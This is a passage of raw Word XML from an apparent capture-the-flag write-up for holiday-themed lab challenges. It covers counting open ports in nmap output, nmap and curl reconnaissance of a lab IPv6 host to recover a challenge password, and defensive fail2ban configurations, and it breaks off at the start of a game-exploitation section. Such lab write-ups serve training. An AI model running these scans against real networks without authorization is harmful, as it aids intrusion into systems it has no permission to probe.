        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>elf@6e5595dc136e:~$ expr 26054 - 25652</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C978E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>402</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E33743" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="0094724D"/>
    <w:p w14:paraId="0D8F19A7" w14:textId="3F2ED662" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>(Explanation: hosts with no open ports do not have a corresponding "Ports" output line. By finding every entry containing “Ports” and subtracting it from the total number of hosts in the file, we can derive items with no open ports.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C22E6" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="0094724D"/>
    <w:p w14:paraId="2477CE1F" w14:textId="77777777" w:rsidR="00342C83" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What's the greatest number of TCP ports any one host has open? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D7C0E8" w14:textId="2723D38F" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011068B0" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">elf@6e5595dc136e:~$ grep "Status: Up" -A 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bigscan.gnmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | grep "Status: Up" -v | cut -d'(' -f3| sort -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13D325" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="0094724D"/>
    <w:p w14:paraId="6D8CEAB2" w14:textId="232B4571" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>(Explanation: This is a hacky command to pull out the filtered/closed result at the end of the scan results and sort them. By sorting and seeing the number with the least ports closed, we can derive how many common TCP ports are open by subtracting it from 1000. The lowest result were hosts with 988 ports closed.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214A8CC" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="28CF75DA" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>IMDS Exploration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8FC38" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>This is more of an interactive tutorial than a challenges. However, if anyone lacks direct experience with cloud platforms like I did, it will provide great guidance when working on the job application objective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A20C9E2" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="7965B1E1" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 Sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65EB8A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>To solve this challenge, we have to discover and access a service running on this terminal using a password that’s stored on another machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A09EF10" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>First, I ran “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>sho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to find my local IP—192.168.160.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A252229" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">Then I searched the local subnet for hosts: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.160.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443E1C5D" w14:textId="61CBA7A8" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>This found 192.168.160.1 with port 22 and port 8000 open and 192.168.160.2 with port 80 open and DNS hostname “ipv6-server.ipv6guest.kringlecastle.com”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2EAD6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>curl 192.168.160.1:8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> receives a response that there is a wrong API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92F73E" w14:textId="5CEBB937" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>curl 192.168.160.2:80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> receives a response that the site is better when accessed via IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5323EA87" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>It is possible to use ping6 ipv6-server.ipv6guest.kringlecastle.com to receive the IPv6 address and curl that. However, who wants to type IPv6 addresses?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E91131" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>curl ipv6-server.ipv6guest.kringlecastle.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suggests to connect to another open TCP to get the striper’s activation phrase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45379A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">During enumeration, I didn’t discover any other open ports on this host. However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uses IPv4 by default. By forcing a scan against the v6 address, we may find additional ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72EEA1" w14:textId="152836A2" w:rsidR="0094724D" w:rsidRDefault="00342C83" w:rsidP="0094724D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -6 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- ipv6-server.ipv6guest.kringlecastle.com</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> reveals that 9000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve"> is open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D396E9B" w14:textId="0AF7E17C" w:rsidR="0094724D" w:rsidRDefault="00342C83" w:rsidP="0094724D">
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>url ipv6-server.ipv6guest.kringlecastle.com:</w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t>9000 reveals that the password to submit in the top panel is “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094724D" w:rsidRPr="00342C83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PieceOnEarth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve">” to complete the challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F54FB2A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="51F128E7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HoHo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> … No</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB05AE" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">To complete this challenge, we must create custom </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jail, filter, and action files to automatically block hosts that belong on the naughty list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF2438E" w14:textId="5A2D5403" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>The criteria for being blocked is that a host must have 10 or more failures in an hour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32168A69" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>First, I grepped through the logs to find references to failures or errors. By continuously piping grep results to -v we can exclude more and more known phrase patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8A03C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">This uncovered four formats for failure messages. These can be used in a file named </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/fail2ban/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>filter.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hohono.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7D938" w14:textId="51BC073A" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>[Definition]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414EE64" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failregex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = Login from &lt;HOST&gt; rejected due to unknown user name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A633F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Failed login from &lt;HOST&gt; for .*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E3776" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;HOST&gt; sent a malformed request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F27FF6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            Invalid heartbeat .* from &lt;HOST&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23CEE4" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="4BC4E874" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">The instructions to the challenge indicate the commands that need to run when adding or removing entries from the naughty list. These can be used in a file named </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/fail2ban/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>action.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hohono.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C168C12" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>[Definition]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680877E3" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>actionban</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>naughtylist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC2824" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>actionunban</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>naughtylist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remove &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCBD67" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="2E8AE778" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">Finally, to utilize the custom filter and action, we need to create a custom jail at </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/fail2ban/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>jail.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>hohono.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with the following contents that define the log location, action and filter files, max failures, and timespan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DEB246" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hohono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769EC70" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A069B1" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">action = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hohono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66037F71" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">filter = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hohono</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F3D1195" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = /var/log/hohono.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D83A73" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxretry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064725E6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>findtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72858D0B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="0880CA72" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">To get the new configuration files loaded, </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has to be reloaded with the command “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>system fail2ban restart</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE9EF1" w14:textId="17FCD98C" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">Then, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>naughtylist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should be refreshed with “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>naughtylist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> refresh</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55147B36" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">Provided there are no issues with filters, this should add all the malicious IP addresses to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>naughtylist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and complete the challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7A388" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="314E9224" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Holiday Hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA7A9D" w14:textId="76F8A0F4" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To complete this challenge, we need to successfully play the “Santa’s Holiday Hero” game to refuel Santa’s sleigh. The catch is, this is a multiplayer game, which will require coordinating with another user or exploiting the game to play solo. Standing outside the game, Chimney </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Scissorsticks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> does mention there is a clever way to do so by setting “two client-side values, one of which is passed to the server.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662EB079" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
      <w:r>
